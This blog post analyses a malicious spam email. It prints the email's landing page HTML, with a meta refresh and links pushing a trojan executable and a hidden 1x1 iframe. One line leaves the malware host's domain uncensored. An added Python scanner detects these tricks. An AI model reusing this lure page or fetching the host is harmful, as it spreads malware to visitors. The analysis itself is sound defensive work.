Malicious Spam in Action

Hi,

Spam is usually sent for mass marketing and carries no malicious code, but lately a second, rapidly growing trend has emerged (especially on web applications that allow comments, such as blogs): malicious spam, an apparently ordinary spam mail that redirects you to malicious code.

Here is the latest malicious spam mail that I've received on my Gmail account:

Subject: mp3 Shocking for evilcry

Content: Rihanna New video!!!
Look It now

The malicious link points to http://ro{CENSORED}eel.com/index1.php

By dissecting the malicious link we can see that it performs a redirection:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://robbiereel.com/video3425gdf3.exe">
<title></title>
</head>

<body style="background:#ffffff;">
<iframe src="http://ro{CENSORED}l.com/pindex.php" style="width:1px; height:1px;"></iframe><br>

<div style="text-align:center; padding-top:50px;">
<a href="http://ro{CENSORED}l.com/video3425gdf3.exe" style="font-weight:bold;"><img src="wait.gif" style="border:0px;"></a><br>
<br>
<a href="http://r{CENSORED}l.com/video3425gdf3.exe" style="font-weight:bold; color:#364980; font-size:17px;">Download Video</a>

</div>
</body>
</html>

The technique is always the same: a fake Video.exe that the victim downloads and executes. In this case the malware is named video3425gdf3.exe.
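As an added example (not part of the original post), here is a small Python scanner for the three indicators visible in the landing page above: a meta refresh whose target is an executable, a 1x1 hidden iframe, and anchor tags pointing at .exe files. The sample HTML is constructed to mirror the page's layout and uses a placeholder domain.

```python
"""Flag the redirect tricks used by the spam landing page: a meta refresh
to an executable, a tiny hidden iframe, and links to executable files."""
import re
from html.parser import HTMLParser

EXE_RE = re.compile(r"\.(exe|scr|bat|pif)(\?|$)", re.IGNORECASE)
META_URL_RE = re.compile(r"url\s*=\s*(\S+)", re.IGNORECASE)
TINY_RE = re.compile(r"(width|height)\s*:\s*([0-9]+)px", re.IGNORECASE)


class LandingPageScanner(HTMLParser):
    """Collect indicators as (kind, url) tuples in document order."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases tag and attribute names
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_URL_RE.search(a.get("content", ""))
            if m:
                url = m.group(1)
                kind = "meta-refresh-to-exe" if EXE_RE.search(url) else "meta-refresh"
                self.findings.append((kind, url))
        elif tag == "iframe":
            # width/height of 2px or less: invisible to the user, still loads
            sizes = [int(n) for _, n in TINY_RE.findall(a.get("style", ""))]
            if sizes and max(sizes) <= 2:
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "a" and EXE_RE.search(a.get("href", "")):
            self.findings.append(("link-to-exe", a["href"]))


def scan_landing_page(html):
    scanner = LandingPageScanner()
    scanner.feed(html)
    return scanner.findings


# Constructed sample with the same structure as the spam page; placeholder domain.
SAMPLE = """<html><head>
<META HTTP-EQUIV="refresh" CONTENT="5;URL=http://malicious.example/video3425gdf3.exe">
</head><body>
<iframe src="http://malicious.example/pindex.php" style="width:1px; height:1px;"></iframe>
<a href="http://malicious.example/video3425gdf3.exe">Download Video</a>
</body></html>"""

if __name__ == "__main__":
    for kind, url in scan_landing_page(SAMPLE):
        print(f"{kind}: {url}")
```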

Let's analyse video3425gdf3.exe

File: video3425gdf3.exe

MD5: acd73c4930e8191fa7a35dac448d7f4b

Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Agent.aacg
